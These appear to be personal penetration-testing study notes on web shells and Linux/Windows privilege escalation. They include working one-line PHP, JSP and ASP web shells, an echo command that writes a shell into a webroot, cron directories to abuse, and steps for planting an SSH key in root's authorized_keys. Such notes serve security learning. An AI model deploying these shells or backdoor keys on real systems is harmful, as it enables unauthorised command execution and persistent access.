1. Web shell scripts
<?php system($_REQUEST["cmd"]); ?>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<% eval request("cmd") %>
2. Uploading a webshell
- Common default webroots
1) Apache: /var/www/html/
2) Nginx: /usr/local/nginx/html/
3) IIS: c:/inetpub/wwwroot/
4) XAMPP: C:/xampp/htdocs/
- we can check these directories to see which webroot is in use and then use echo to write out our web shell.
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
3. Accessing the webshell
we can visit the created php page and use ?cmd={command} to execute the terminal commands on ghe compromised website.
4. hacktricks: privesc checklists
https://book.hacktricks.xyz/
5. privesc enumeration scripts
1) linux: LinEnum, linuxprivchecker
2) windows: Seatbelt, JAWS
3) both: PEASS
6. privesc vectors
1) kernel exploit:
whenever we encounter a server running on old OS (e.g., Linux version), we should start by looking for potential kernel vulns
2) vulnerabl software
- Linux: dpkg -l
- Windows: C:/Program Files
3) User privileges: privileges available to the user we have access to.
- sudo
- SUID
- Windows token privileges
* A list of applications
(1) linux: GTFOBins
(2) windows: LOLBAS
4) scheduled tasks
(1) linux: cron jobs
(2) windows: scheduled tasks
- there are 2 ways to exploit scheduled tasks:
(1) add new scheduled tasks
(2) trick them to execute a malicious software
- there are specific directories that we may be able to utilize to add new cron jobs if we have write permissions over them:
(1) /etc/crontab
(2) /etc/cron.d
(3) /var/spool/cron/crontabs/root
5) exposed credentials
6) ssh keys:
(1) if we have read access over the .ssh directory
: copy these and use them to log in to the ssh (e.g., ssh root@10.10.10.10 -i id_rsa)
- home/user/.ssh/id_rsa
- root/.ssh/id_rsa
(2) if we have write access over the .ssh directory
a. gain a shell as the user
b. ssh-keygen -f key: generate key (on our host)
-> output files: key, key.pub
c. copy key.pub and add it into /root/.ssh/authorized_keys (on the user machine)
d. now, we can root login as that user by using our private key